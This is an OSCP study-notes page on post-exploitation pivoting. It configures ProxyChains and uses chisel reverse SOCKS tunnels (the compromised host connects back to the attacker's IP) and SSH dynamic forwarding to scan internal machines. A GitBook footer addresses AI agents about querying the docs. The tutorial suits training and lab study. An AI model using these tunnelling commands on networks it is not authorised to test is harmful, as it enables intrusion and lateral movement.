> For the complete documentation index, see [llms.txt](https://dhaneshsivasamy07.gitbook.io/oscp-2022/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dhaneshsivasamy07.gitbook.io/oscp-2022/linux-post-exploitation/pivoting-proxychains.md). # Pivoting ( ProxyChains ) Pivoting lets the attacker access the services/machines the compromised machines connected to. Pivoting allows the attacker to enlarge the attack surface by performing actions as the network-connected machine ![Image by VickieLi](/files/NMsZRYHwy6hHDEKWXF32) Tools Required: * ProxyChains ```bash sudo apt install proxychains ``` * SSH / CHISEL **NEED:** With proxychains tools which are not available in the compromised machine can be used from the attaker machine (eg: medusa etc..,) > kali -> proxychains -> compromised\_machine -> request for accessing from internal\_machine -> internal\_machine:80 ## Exploitation * After installing proxychains in the attackers machine * Configure the port that will be used by the proxychains with its protocol being SOCK Proxy ```bash sudo vi /etc/proxychains.conf # comment the last line 9050 --> used by TOR # add the following # socks5 127.0.0.1 socks5 127.0.0.1 9051 ``` * Perform Dynamic port forwarding ### Chisel * When SSH Password is not available, make use of chisel to perform * Start a chisel server on the attacker machine ```bash # attacker IP: 192.168.1.1 # syntax: ./chisel server -p {port} --reverse ./chisel server -p 1337 --reverse ``` * On the compromised machine connect to the attackers reverse connection ```bash # syntax: chisel client {attacker IP}:{port on chisel server} R:socks ./chisel client 192.168.1.1:1337 R:socks # on a debian based machine chisel.exe client 192.168.1.1:1337 R:socks # on a windows machine ``` * Once the connection is made successfully from the compromised machine to the attackers machine, the chisel on the attackers machine will show the port the chisel is connected to ```bash 2021/01/15 17:11:47 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening ``` * By default chisel will connect on port 1080, so lets change the configuration in the proxychains to perform actions on this port (1080) ```bash sudo vi /etc/proxychains.conf # comment the last line 9050 --> used by TOR # add the following socks5 127.0.0.1 1080 ``` * Now we can execute commands with proxychains ```bash proxychains nmap -p- internalIp ``` ![Proxychains with chisel](/files/3jM5Jirw2XDbeZBG09TJ) ![Legend](/files/haExa2gnsoMVw8hLH1jN) ### SSH * Perform Dynamic Port Forwarding ```bash ssh -D 9051 charix@10.10.10.84 # 9051 is the port configured in proxychains.conf file ``` * Once the connection initializes, an attacker can use proxychains to leverage the attack surface ![Proxychains with SSH](/files/SzOkHY82r4hus41FgMbA) * Legend * 1 - Added the port 9051 in the /etc/proxychains config file * 2 - Inspecting the port activity of 9051 in attackers machine * 3 - Dynamic port forwarding to the port configured in proxychains `-D 9051` * 4 - Activity on the port 9051 in attakcers machine * 5 - Grabbing banner of the service running on port 25 in the compromised machine * 6 - Using proxy chains to obtain the banner of the service on port 25 in the compromised machine > Bruteforces / Automated attack tools can be used with proxychains --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://dhaneshsivasamy07.gitbook.io/oscp-2022/linux-post-exploitation/pivoting-proxychains.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.